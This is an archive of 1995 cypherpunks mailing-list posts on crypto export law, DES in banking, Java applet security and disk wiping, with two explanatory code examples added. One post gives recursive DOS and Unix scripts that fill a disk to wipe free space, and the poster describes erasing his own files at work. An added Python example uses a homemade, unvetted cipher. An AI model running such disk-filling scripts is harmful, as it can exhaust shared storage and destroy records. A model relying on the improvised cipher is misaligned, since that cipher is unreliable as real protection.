FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 28 Jul 95 08:00:11 PDT
To: KDAGUIO@aba.com
Subject: Re: Banks and Crypto - Again
Message-ID: <9507281459.AA03673@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Critics say that the longer DES is used, the more likely its code
>  could be broken.  While realizing this could limit its life span
>  as a government certified standard, ABA warned that requiring banks
>  to convert to a new standard by 1998 (the year DES's certification
>  expires) could be prohibitively costly due to the high level of
>  electronic funds transfers secured by DES.  ABA therefore encouraged
>  the National Institute for Standards and Technology (NIST) to
>  continue to endorse DES as a Federal Information Processing Standard
>  (FIPS) for use by the financial community.

"Breaking DES keys in a reasonable amount of time could be prohibitively  
costly for Banks due to the high level of electronic funds transfers secured  
by DES."

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 07:07:28 PDT
To: meredith@ecid.cig.mot.com (Andrew D Meredith)
Subject: Re: Hooks to Crypto
In-Reply-To: <9507281450.ZM15992@jurua.sweng.ecid.cig.mot.com>
Message-ID: <9507281401.AA26689@all.net>
MIME-Version: 1.0
Content-Type: text


...
> > because people in the US aren't willing to risk jail over their
> > right to do it.  The only court case I am aware of was the RSA case
> > and in that one, the courts ruled against the NSA - but in today's
> > political and economic environment, people who do cryptography
> > don't want to risk it.
> 
> Judging by the PZ case, I can't say as I can really blame them. It
> would be better of course if they would go for it, but ...

In my case, I just opted to move my crypto business outside the US. 
This is the real result of the crypto policy.  The US is falling behind
the rest of the world in crypto R+D.  For example, two good crypto
packages for the Internet have been released in the last few months.  I
was engaged in a similar project in the late 80s but abandoned it
because I couldn't export, so the market would not justify the work. 
Now it is owned by people in EC and Australia who are generous enough to
allow those of us in the US to use them.

Of course, I can't post them in info-sec heaven because even imported
crypto software may not be exported, and I cannot adequately detect the
difference between a foreign person using a US site to get the
information and a legitimate US site getting the information for itself. 
In other words, the policy prevents US firms from having better Internet
resources in the info-sec arena.

...
> This would infer that anything that can cause information to be piped
> out to a package and then the result sucked back in would fall into
> this category.

Right - in other words, nothing can be exported if it produces output
and takes input.  The point is, they want a way to arrest people who are
doing something they don't like.  Phil Zimmermann would almost certainly
win if they ever took him to court, but by harassing him in this more
subtle way, they destroy the impact of PGP in the marketplace, get MIT
to support an official (and perhaps customized for the NSA to have weak
keys) version, and prevent others from following in Phil's footsteps. 
So the strategy works until some brave person risks enough to get past
it.

...
> 1 - Find yourself a tenuous link with some Psycho-Baby-Killer group.
> 2 - Start a "This must be stopped" campaign.
> 3 - Propose the "Internet Pornography Act"
> 4 - Shove it through before anyone can get together enough
>     opposition to get it squashed. (and that would have to be a
>     GREAT DEAL of opposition).
> 
> That's how they did the "Criminal Justice Act" which breaks both
> European and International law in a great many places. That's how
> they'll do the "Internet Pornography Act". It'll be just loose enough
> to include just about anything they want it to.

All true, but as the saying goes:

Representative democracy is a terrible form of government,
but every other form of government we know of is even worse.

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
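
The point made in the two "Hooks to Crypto" replies above (a compression hook is easily turned into an encryption hook, and anything that passes data out to a package and reads the result back qualifies), as an added Python example that is not from either poster. The host functions `store` and `load`, the `HOOK1` framing and both filter classes are hypothetical, and `KeyedFilter` is an illustrative SHA-256 keystream plus HMAC construction standing in for an external crypto package, not a vetted cipher.

```python
import hashlib
import hmac
import os
import zlib

MAGIC = b"HOOK1"  # hypothetical frame marker for this example


def store(record, hook):
    """Host application: pass the record through the hook, then frame it."""
    payload = hook.encode(record)
    return MAGIC + len(payload).to_bytes(4, "big") + payload


def load(frame, hook):
    """Host application: check the frame, then undo the hook's transform."""
    if frame[:5] != MAGIC:
        raise ValueError("not a HOOK1 frame")
    size = int.from_bytes(frame[5:9], "big")
    payload = frame[9:9 + size]
    if len(payload) != size:
        raise ValueError("truncated frame")
    return hook.decode(payload)


class CompressionFilter:
    """The transform a 'compression hook' is normally shipped with."""

    def encode(self, data):
        return zlib.compress(data)

    def decode(self, blob):
        return zlib.decompress(blob)


class KeyedFilter:
    """Stand-in for a separately obtained crypto package (illustrative only)."""

    def __init__(self, key):
        # Derive separate keys for the keystream and for the integrity tag.
        self.enc_key = hashlib.sha256(b"enc" + key).digest()
        self.mac_key = hashlib.sha256(b"mac" + key).digest()

    def keystream(self, nonce, length):
        out = bytearray()
        counter = 0
        while len(out) < length:
            block = self.enc_key + nonce + counter.to_bytes(8, "big")
            out += hashlib.sha256(block).digest()
            counter += 1
        return bytes(out[:length])

    def encode(self, data):
        nonce = os.urandom(16)
        stream = self.keystream(nonce, len(data))
        body = bytes(a ^ b for a, b in zip(data, stream))
        tag = hmac.new(self.mac_key, nonce + body, hashlib.sha256).digest()
        return nonce + body + tag

    def decode(self, blob):
        if len(blob) < 48:
            raise ValueError("payload too short")
        nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
        expected = hmac.new(self.mac_key, nonce + body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            raise ValueError("authentication failed")
        stream = self.keystream(nonce, len(body))
        return bytes(a ^ b for a, b in zip(body, stream))


class Chain:
    """Applies several filters in order; the host still sees one hook."""

    def __init__(self, *filters):
        self.filters = filters

    def encode(self, data):
        for f in self.filters:
            data = f.encode(data)
        return data

    def decode(self, blob):
        for f in reversed(self.filters):
            blob = f.decode(blob)
        return blob


# Constructed sample record, not real data.
SAMPLE = b"wire transfer 1000 to account 42\n" * 20

if __name__ == "__main__":
    hooks = {
        "compress": CompressionFilter(),
        "keyed": KeyedFilter(b"constructed demo key"),
        "compress+keyed": Chain(CompressionFilter(),
                                KeyedFilter(b"constructed demo key")),
    }
    for name, hook in hooks.items():
        frame = store(SAMPLE, hook)  # same host code for every hook
        assert load(frame, hook) == SAMPLE
        print(f"{name:15s} frame bytes: {len(frame)}")
```

The host code (`store` and `load`) is identical in all three runs; only the object plugged into the hook differs, which is the property the export-licensing argument in the thread turns on.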



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 07:12:00 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507280729.DAA01649@clark.net>
Message-ID: <9507281410.AA07271@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
> 
>   Just a quick note to chime in. The OSF just did a deal with Sun
> to port Java to several platforms. The OSF is opening a "web mall"
> where you can grab software objects and run them. Expect Java to
> *really* take off in about 2-3 months. Every business on the net is going
> to want a Java shopping-client-basket on their web-mall/web-store.
> (Web Consultants! Learn Java!)

As a security consultant, I'm very happy about Java because once the
holes are found in it and massive, Morris style worms are launched
with it, I'll be laughing all the way to the bank.

I exaggerate only slightly. I don't believe Java to be secure, in spite
of the claims. It's too complicated, and it operates in an environment
whose correct operation is required for it to remain secure. Good
system design says that you want a system's failure mode to produce a
secure result, but that's not what Java does.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 28 Jul 95 08:53:36 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <199507281554.KAA08561@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Web Mall, OSF, Java, ports, etc]

//  See http://www.osf.org/comm/press/950276-ato.html for more details.

Actually, try http://www.osf.org/comm/press/950726-ato.html instead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 08:03:54 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Java, Netscape, OpenDoc, and Babel (NewsClip)
In-Reply-To: <199507281335.PAA27686@utopia.hacktic.nl>
Message-ID: <9507281503.AA22612@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Based on the recently posted announcement, it is not at all clear that the
following is accurate:

> The OSF is opening a "web mall"
> where you can grab software objects and run them

Can somebody confirm or deny this? It makes a big difference. A few additional
ports won't significantly enhance Java's adoption as the standard for secure
interplatform network transport of executables. This has been a done deal
since Netscape announced that it was licensing and Sun committed to Mac and
Win95 ports.

On the other hand, a Java object brokerage service sponsored by OSF
including a few basic object support services could make a substantial
difference in the pace at which Java class libraries develop.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 28 Jul 95 08:05:55 PDT
To: cypherpunks@toad.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <9507281504.AA06867@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Just a quick note to chime in. The OSF just did a deal with Sun
>to port Java to several platforms. The OSF is opening a "web mall"
>where you can grab software objects and run them. 

Well, not quite.  The "Open Mall" is part of OSF's new advanced technology
offerings.  Free source for non-commercial use, fetchable from the Open
Mall, a Web server.  You'll be able to find the mall (in a week or two)
from OSF's home page, http://www.osf.org/.

The Java ATO includes ports to SVR4 (dunno whose) and HP, and more
importantly, a study of the security aspects and implications of Java:
is it truly a "safe" language to write in?  And what does safe mean, and for
whom (server, client, user, hardware, etc)?  The study will be a paper, also
avail from the mall.

See http://www.osf.org/comm/press/950276-ato.html for more details.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 08:25:43 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <9507281525.AA22734@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|> As a security consultant, I'm very happy about Java because once the
|> holes are found in it and massive, Morris style worms are launched
|> with it, I'll be laughing all the way to the bank.

|> I exaggerate only slightly. I don't believe Java to be secure, in spite
|> of the claims. It's too complicated, and it operates in an environment
|> whose correct operation is required for it to remain secure. Good
|> system design says that you want a system's failure mode to produce a
|> secure result, but that's not what Java does.

I disagree for the simple reason that Java and Hotjava are not being
treated as trusted code in their applications. Applets are tightly
constrained in what they can do, and hotjava's default attempt to
configure a "firewall" when it boots up is not likely to engender a false
sense of security.

I've been looking at the Java code closely for a couple of months now, and
I find it to be relatively clean in its implementation (Solaris version at
least). I think the biggest worry might be holes in the non-Sun ports along
the host machine interfaces. Overall, I give the Solaris implementation
extremely high marks in terms of its security. I think I'm actually more
worried by far less powerful browsers whose code I don't approve of, like
Mosaic. The vast majority of security problems result from the fact that
most code has security added in AFTER coding starts. Java has been designed
for excellent security from the very beginning.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 08:30:53 PDT
To: solman@MIT.EDU
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281525.AA22734@ua.MIT.EDU>
Message-ID: <9507281530.AA18869@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



solman@MIT.EDU writes:
> I disagree for the simple reason that Java and Hotjava are not being
> treated as trusted code in their applications. Applets are tightly
> constrained in what they can do,

You are incorrect. Applets are DESIGNED to be tightly constrained in
what they do. You want to bet your career that there are no bugs in
the implementation of this design? The thing keeping you from opening
sockets or doing file-io is a very thin scrim. Are you *certain* that
it is bug free? I'm not.

> I've been looking at the Java code closely for a couple of months now, and
> I find it to be relatively clean in its implementation (Solaris version at
> least).

Are you willing to bet your career that it's bug free? That's my question.

> I think I'm actually more worried by far less powerful browsers
> whose code I don't approve of, like Mosaic.

Don't get me wrong -- Mosaic also bothers me, as does Netscape. Java,
however, gives me the willies.

> The vast majority of security problems result from the fact that
> most code has security added in AFTER coding starts. Java has been
> designed for excellent security from the very beginning.

*designed*. Can you be certain that both the design and the
implementation are bug free?

I like systems that are more fail-safe. About half a dozen
simultaneous bugs would be needed to break some of my more secure
firewalls, for example. Java does *not* provide security in depth.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 08:46:08 PDT
To: Andrew D Meredith <meredith@ecid.cig.mot.com>
Subject: Re: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers)
In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
Message-ID: <Pine.BSD/.3.91.950728113326.24958G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jul 1995, Andrew D Meredith wrote:

> On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote:
> > Subject: Re: NSA and the NCSA/Apache web servers
> 
> > Actually, neither hooks nor encryption are unexportable, you
> > just need a license to export them.

The answer is to have some non-USA entity build shareable full fledged 
full powered crypto libraries and provide them for free for the rest of 
the world and for all machines.

On Windoze DLL's or WIN32's would be needed, on PPC Mac's shared Lib's, 
on 68K Macs, an INIT that hooks itself via Gestalt, on Unix, shared 
LIB's, etc.  I would also include routines for asking the user for a 
passphrase to prevent the running application from grabbing that password 
and providing weak security.  Or a program running in the background that 
handles all the calls via IAC's or whatever... (like AppleEvents to PGP)

All with full free source, etc and PGP compatibility, etc.  Then the rest 
of us could write code that uses that library.  Whoever wants crypto just 
downloads the library from wherever and uses it.

In this case, would code written in the USA be exportable?  

Wei's library would have been perfect for something like this... too bad. :-(

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 09:09:43 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: mac share/freeware app for overwriting unused hd space?
In-Reply-To: <ac3dc7f7060210042380@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950728114323.24958L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Timothy C. May wrote:

> At 2:27 PM 7/27/95, j. ercole wrote:
> >Can anyone point me towards a program that's freeware or shareware that
> >will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
> >sincerely apologise if this is a faq.  I know norton's will do it but I
> >don't presently have that installed on my machine.  Thanks oodles,

Something could be written to just write a bunch of random garbage to a 
file until the volume runs out of free space, then overwrite that file 
several times before deleting it.  I think this is what MacTools's 
Trashback - EraseFreeSpace option does.  I used to do this for DOS 
machines with a batch file:

Type this in at the DOS prompt (for those who use DOS):
COPY CON FILLDRIVE.BAT

@ECHO OFF
@DIR >>KILLME.TXT
@TYPE KILLME.TXT >>KILLME.TXT
@FILLDRIVE.BAT   (hit RETURN ON THIS LINE AND THEN HOLD CONTROL AND HIT Z,
                  and RETURN again.)

Just run this until you see hard drive full errors.  This creates an 
exponentially increasing file called "KILLME.TXT" by copying that file to 
itself on each pass.  First pass the file is the size of the directory, 
the second pass, it's 3 times the size, the third pass 7 times, the 
fourth pass, it's 15 times, etc.

When you finally run out of space, hit CONTROL-BREAK and then delete 
the KILLME.TXT file to release the free space.

Basically, no matter who I work for, I write a batch file that zaps the 
SecureDevice file on the root directory, then runs this thing, so if I 
have to leave the place in a hurry I can erase my personal files without 
much hassle and little danger of having them compromised.  (I also have a 
few other neat tools to let me know if someone has been snooping on my 
machine at work, but I won't disclose those :-)

Do this a few times and everything is cool.  Off the top of my head, the 
unix equivalent would be:

ls -l >>killme.txt
cat killme.txt >>killme.txt
filldrive

But be careful not to run this when other folks are on, or if you're not 
the sysadmin as you'll overrun your quota very quickly.  (The above 
wasn't tested, and I'm not sure if under unix you can append a file to 
itself, etc. so #include <stdwarnings_n_disclaimers.h>)

> At the most serious level of attack (the "threat model"), such as the FBI
> labs in Quantico or the NSA, there are reports that specialized disk drive
> heads are used to recover earlier signals that are not erased even with N
> active overwrite steps (apparently the head jitter in most drives means
> that each write cycle is slightly different, even on the same disk region,
> and a slight "shadow" or "ghost" of previous writes can sometimes be
> extracted).

In this day and age drives are getting smaller and smaller while the 
capacity increases. This means the tracks are smaller and the data spill 
caused by the jitter is smaller and smaller tending towards almost 
useless.   I really think our TLA friends are having a harder 
time at this than usual.  But suffice to say I still do a wipe three or 
four times anyway.  i.e. It's easy to do something like this on a 5.25" 
full height 40MB MFM drive, but on a 4GB 3.5" LPS drive, much, much harder.

(I guess though, I must be paranoid though as I did buy a nice big bulk 
eraser built for floppies. <evil grin>)

> --Tim May, who hopes this will not reignite the thread about how to use
> thermite to permanently erase disk drives

Ditto.


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/
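
A working form of the fill-then-overwrite idea from the message above, added here as an example and not code from the original post; the function name `fill_free_space`, its arguments and the use of /dev/urandom are assumptions of this example. It appends random data instead of copying the file onto itself, because GNU cat refuses `cat killme.txt >>killme.txt` with "input file is output file".

```shell
#!/bin/sh
# Added example (not from the original post): fill the free space of the
# volume holding DIR with random data, overwrite that fill file in place,
# then delete it to hand the space back.
#
# usage: fill_free_space DIR [MAX_MB] [PASSES]
#   MAX_MB  cap on the fill file in MiB; 0 (default) means "until full"
#   PASSES  total number of write passes over the fill file (default 3)
# Prints the number of whole MiB chunks written on the first pass.
fill_free_space() {
    dir=$1
    max_mb=${2:-0}
    passes=${3:-3}
    chunk=1048576

    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    case "$max_mb$passes" in
        *[!0-9]*) echo "MAX_MB and PASSES must be numbers" >&2; return 2 ;;
    esac

    # Hypothetical file name, made unique per process with the shell's PID.
    fill="$dir/killme.$$"
    : > "$fill" || return 1
    chmod 600 "$fill"

    # Pass 1: append random chunks until the cap is hit or a write fails
    # (a failed write is the "disk full" condition the post waits for).
    written=0
    while [ "$max_mb" -eq 0 ] || [ "$written" -lt "$max_mb" ]; do
        dd if=/dev/urandom bs="$chunk" count=1 2>/dev/null >> "$fill" || break
        written=$((written + 1))
    done
    sync

    # Remaining passes: rewrite the same file without truncating it, so the
    # space stays allocated between passes.
    pass=2
    while [ "$pass" -le "$passes" ] && [ "$written" -gt 0 ]; do
        dd if=/dev/urandom of="$fill" bs="$chunk" count="$written" \
            conv=notrunc 2>/dev/null || break
        sync
        pass=$((pass + 1))
    done

    # Release the space again.
    rm -f "$fill"
    echo "$written"
}
```

The later passes land on the same blocks only on filesystems that overwrite in place; copy-on-write filesystems and flash drives with wear levelling may put each pass somewhere else. As the message warns, an uncapped run on a shared machine will exhaust the volume or a quota for everyone.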





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 28 Jul 95 09:08:55 PDT
To: jon cameron <cellf@free.org>
Subject: Re: PS/2 passwd bypassed at bootup?
In-Reply-To: <Pine.BSD.3.91.950727201615.20637H-100000@squeaky.free.org>
Message-ID: <Pine.BSD/.3.91.950728115929.24958N-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Never heard of such a disk.  However, I'm not sure it can be disabled as 
it's in CMOS, and the PS/2 (Half a personal computer?) I remember with 
this password crap didn't even do a floppy seek, so if they don't read 
the A: drive, how can there be a boot admin disk?  (I may be wrong, but 
that's what I remember.)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Fri, 28 Jul 95 09:16:00 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281530.AA18869@snark.imsi.com>
Message-ID: <9507281615.AA23005@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Thus spake Perry:
|> solman@MIT.EDU writes:
|> > I disagree for the simple reason that Java and Hotjava are not being
|> > treated as trusted code in their applications. Applets are tightly
|> > constrained in what they can do,

|> You are incorrect. Applets are DESIGNED to be tightly constrained in
|> what they do. You want to bet your career that there are no bugs in
|> the implementation of this design? The thing keeping you from opening
|> sockets or doing file-io is a very thin scrim. Are you *certain* that
|> it is bug free? I'm not.

What's with the facetious questions? Only an idiot would guarantee a piece
of software to be error free. I am highly confident that there is very
little probability of a raider applet doing significant damage. That's as
much as I can say of any of the systems I use... and it's saying
a lot given that the thing is executing code it pulls off the net. Is there
still room for cleaner code? Definitely, and I think we'll see some of it
as Java goes Beta and then production.

|> I like systems that are more fail-safe. About half a dozen
|> simultaneous bugs would be needed to break some of my more secure
|> firewalls, for example. Java does *not* provide security in depth.

I think that the high level architecture of Java provides as much security
as such a product can possibly provide. By the time Java becomes widely
distributed (it is still in Alpha3), I expect it to have features that deny
access to any applet not signed by somebody in a list the user creates, a
sort of web of trust. On top of this layer, Java already offers rudimentary
firewalls. The combination of these layers should be quite effective.

Of course, Netscape will probably find a way to screw their implementation
up :)

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 09:24:38 PDT
To: perry@piermont.com
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281410.AA07271@snark.imsi.com>
Message-ID: <199507281624.MAA11581@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ray Cromwell writes:
> > 
> >   Just a quick note to chime in. The OSF just did a deal with Sun
> > to port Java to several platforms. The OSF is opening a "web mall"
> > where you can grab software objects and run them. Expect Java to
> > *really* take off in about 2-3 months. Every business on the net is going
> > to want a Java shopping-client-basket on their web-mall/web-store.
> > (Web Consultants! Learn Java!)
> 
> As a security consultant, I'm very happy about Java because once the
> holes are found in it and massive, Morris style worms are launched
> with it, I'll be laughing all the way to the bank.

  Holes have already been found in CERN HTTP. The GETS() style bug
was in the first few versions allowing attacks to overwrite the
process stack. Any mail server written in perl is susceptible
to weird attacks. For instance, if you ever eval/exec any variable
that is double-quoted, rather than single quoted, it is possible to
run shell commands via backticks or shell subprocesses in variable names.
In fact, can you even prove that elm or pine don't have some obscure
bug wherein a certain message, say with malformed headers, can
overwrite the stack and allow Morris style attacks? The "Good Times"
virus may actually be possible. 

  Security is very nice to have. It's nice to rely on. But sometimes 
there's a need for some liberty. Make everything as secure as you
can, but if security prevents you from doing something that you want
to do, it's not helping you. The internet would be a very cold and 
barren place if the only application people ran was mail.

  Object Oriented Superdistributed components are so useful an abstraction,
I think it's worth the security risk. HotJava solves some fundamental
issues with protocols. Right now the W^3 working groups have been struggling
to define URI/URCs and a whole host of other web protocols. They've been
doing it for years, but they suffer from Xanadu like problems as far as
I can tell. They don't want to saddle the web with a bad protocol, so 
they search to define a perfect one. Hence, no prototypes are ever
deployed, because if they were, the user community might make them
a de facto standard and lock them into it much like MS-DOS locked
PCs into the Dark Ages. With Java, you define all the protocols you
want. If your browser doesn't understand how to fetch a protocol,
it can fetch a protocol handler. There's no need for a kitchen
sink application that understands every protocol in existence.

  And with HotJava, you don't NEED to automatically fetch an application
and run it. You can just use it as an extension language. If someone
defines a new application or protocol handler for it, and this person
is fairly trusted on the net, you can decide to run it (kinda like
turning off autoload images), and even review the source code first.
This is no less secure than ftping software from some site and compiling
it.  

  Maybe for you, the issue is protecting corporate networks behind firewalls.
That's good, well then don't let employees run HotJava. However, I look at
it from the home slip/ppp'ed user standpoint. I think over the next two
years, slip/ppp'ed users will displace corporate/academic users as the
largest group on the net. 

  There will be worms and viruses. Just like there are nowadays. And there
will be fixes. And there will be yet another arms race between virus
writers and people who write anti-virus software. No doubt, there will
be HotJava based worm/virus scanners, etc. A new market will come into
being. You'll make money off of fixing holes. I'll make money off
custom java clients business web pages. It's the price that should be
paid, that is always paid, with any new technology. I'm not advocating
being careless. I'm just saying that paranoid security hampers 
development of more robust and better software. HotJava is a piece
of low-hanging fruit. As more people use it and more problems are found,
better fruit will be found.

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 09:29:42 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281504.AA06867@sulphur.osf.org>
Message-ID: <199507281629.MAA12905@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



re: OSF's mall. 

  Ah, I misunderstood what they were trying to do from an abstract. Now
it's much less exciting. They are just in effect running a beta ftp
site on an http server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 09:33:40 PDT
To: solman@MIT.EDU
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <9507281615.AA23005@ua.MIT.EDU>
Message-ID: <9507281633.AA27805@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



solman@MIT.EDU writes:
> What's with the facetious questions? Only an idiot would guarantee a piece
> of software to be error free. I am highly confident that there is very
> little probability of a raider applet doing significant damage.

I see little reason for such confidence.

> |> I like systems that are more fail-safe. About half a dozen
> |> simultaneous bugs would be needed to break some of my more secure
> |> firewalls, for example. Java does *not* provide security in depth.
> 
> I think that the high level architecture of Java provides as much security
> as such a product can possibly provide.

That's far from true as well. The Java interpreter could have all its
I/O abilities removed, for example, rather than relying on correct
implementation of the possibly correct language model to keep users
from performing I/O. -- I can name lots of similar things.

Having designed systems to be as secure as possible, I'd say that Java
violates lots of the constraints. It's too big, too complicated, and
relies for its security on the correctness of its implementation.

> By the time Java becomes widely distributed (it is still in Alpha3),
> I expect it to have features that deny access to any applet not
> signed by somebody in a list the user creates, a sort of web of
> trust.

Again, this depends on the correctness of the implementation.

> On top of this layer, Java already offers rudimentary
> firewalls.

What?????

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 28 Jul 95 09:37:06 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507281624.MAA11581@clark.net>
Message-ID: <9507281636.AA28295@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Security is very nice to have. It's nice to rely on. But sometimes 
> there's a need for some liberty. Make everything as secure as you
> can, but if security prevents you from doing something that you want
> to do, it's not helping you.

Yes it is.

I know lots of users that would like to do certain dangerous things,
but they are better off not being able to do them because if they
could very likely the security problems would mean in six weeks their
company would be bankrupt and they wouldn't have a job.

Not all cool things are desirable things.

I suspect that the java-like methodology of downloading small apps to
users can be done securely, but the java model doesn't feel like the
right way to do it, at least to me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew D Meredith" <meredith@ecid.cig.mot.com>
Date: Fri, 28 Jul 95 04:38:59 PDT
To: cypherpunks@toad.com
Subject: Hooks to Crypto (was Re: NSA and the NCSA/Apache web servers)
In-Reply-To: <9507281039.AA13694@all.net>
Message-ID: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 28, 12:18pm, Dr. Frederick B. Cohen wrote:
> Subject: Re: NSA and the NCSA/Apache web servers

> Actually, neither hooks nor encryption are unexportable, you
> just need a license to export them.

>-- End of excerpt from Dr. Frederick B. Cohen

I hope I'm not alone in wondering why on earth this is the case.

Ok, exporting cryptography from the USA is restricted, and highly
controversial. I think there has been something on this one already.

But what is it, in the legal wibble, that makes _hooks_ to
cryptography restricted. How have they worded things to make this the
case.

The hooks are of course completely useless in and of themselves. You
